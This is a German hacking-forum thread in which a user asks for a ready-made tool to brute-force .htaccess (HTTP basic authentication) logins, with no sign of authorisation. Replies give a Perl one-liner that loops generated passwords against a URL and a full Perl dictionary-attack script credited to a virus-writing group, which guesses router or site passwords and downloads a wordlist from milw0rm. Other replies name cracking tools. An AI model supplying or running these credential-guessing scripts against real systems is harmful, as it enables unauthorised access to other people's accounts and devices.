[S] .htaccess brute force

[SeD³]

Hey habe Mal ne frage wie kann ich einen htaccess brute forcen ?

Ich will kein UserW listen usen sondern bruten .
Vielen dank für euere hilfe .

[cby]

Hier hast du ein Ansatz, wie man ein Bruteforcer in Perl schreibt.
Das verbunden mit einem HTTP Request würde dann ein .htaccess Bruteforcer ergeben.

perl -e '$_=a;print$_++,$/while(1);'

[SeD³]

Also ich suche ein Prog oder ein script wie ich ein .htaccess brute forcen kann .
Leider kann ich kein perl deshalb suche ich hier nach einer anderen lösung .

[cby]

Und nach was für eine anderen Lösung suchst du?

[Anon_n00j]

oldsch00l johnTheRipper ;D

oder AccessDiver aber sobald ich bruten hoere denn finde ich die chancen immer verschwinden gering ;P ausser der gute Admin 12345 schlägt wieder zu !

mfg n00j

[SeD³]

johnTheRipper kenne ich der soll aber nicht gehen hab ich gelesen .

Und nach was für eine anderen Lösung suchst du?

Fertige Scripts oder Programme

[cby]

Hier hast du ein fertiges Script.

Code:

perl -MLWP::UserAgent -e '$a=a;$u=LWP::UserAgent->new;while(1){$r=$u->head("http://username:".$a++."\@url");last,if($r->headers_as_string()!~/.*realm.*/)}$a--;print"pass=$a",$/'

Das was fett geschrieben ist, sollte man aber noch anpassen.

[Yakuza112]

hab mal auf meiner HD bissel gesucht, hier ebenfalls perl

Code:

#!/usr/bin/perl
=poc
Simple .htaccess bruteforcer. Could be usefull to crack router logins.

by Perforin
virii.lu
#vxnet

Greetings to everyone from #vxnet and EOF
=cut

use HTTP::Request;
use LWP::UserAgent;
use LWP::Simple;
use File::Temp qw(tempfile);

use strict;
use warnings;
use diagnostics;

my($ip,$user,$dic) = @ARGV;
my($fh, $tmpfile) = tempfile("X" x 23, UNLINK => 1);
my($useragent,$request,$zeile,$_,@data);


if (@ARGV < 3) { help(); }

print <<"INTRO";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.htaccess Bruter              by Perforin
                                 virii.lu
                                   #vxnet                             
~[v1.0]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

INTRO

if ($dic =~ m/--milw0rm/i) {
print "[~] Loading milw0rm wordlist...\n";
getstore('http://milw0rm.com/mil-dic.php',$tmpfile) || die "milw0rm down?!\n";
open(DIC,"<",$tmpfile) || die "Wordlist not found or permission denied!\n";
} else {
open(DIC,"<",$dic) || die "Wordlist not found or permission denied!\n";
}

$useragent = LWP::UserAgent->new;
$request = HTTP::Request->new(GET => 'http://' . $ip);

while(<DIC>) {
chomp($_);

$request->authorization_basic($user, $_);  
@data = $useragent->request($request)->as_string;

foreach $zeile (@data) {
if($zeile =~ m/401 Unauthorized/i) {
print "[~] Bruting...\n";
} else {
print "\n[!] Got login!\n";
print "[!] " .  $user . ":" . $_ . "\n";
exit;
    }
  }
}
print "[-] Could not be cracked!\n";
close(DIC);

sub help {
print <<"HELP";
########################################
      .htaccess bruter by Perforin      

brute.pl 192.168.1.1 admin dic.txt
brute.pl 192.168.1.1 admin --milw0rm

###############[virii.lu]###############
HELP
exit;
}

[cby]

Ein Wordlist Script ist meiner Meinung nach keine bruteforce Attacke.
Hier wurde aber explizit nach einem gefragt.
Und lieber was eigenes, dann hättest du auch gemerkt das es kei Brutforce ist.

[Shini]

Milw0rm ist doch auch down oder irre ich ?
wenn ich richtig liege, dann wird das script von jakuza112 nicht gehen
da es doch versucht auf milw0rms wordlist zuzugreifen ?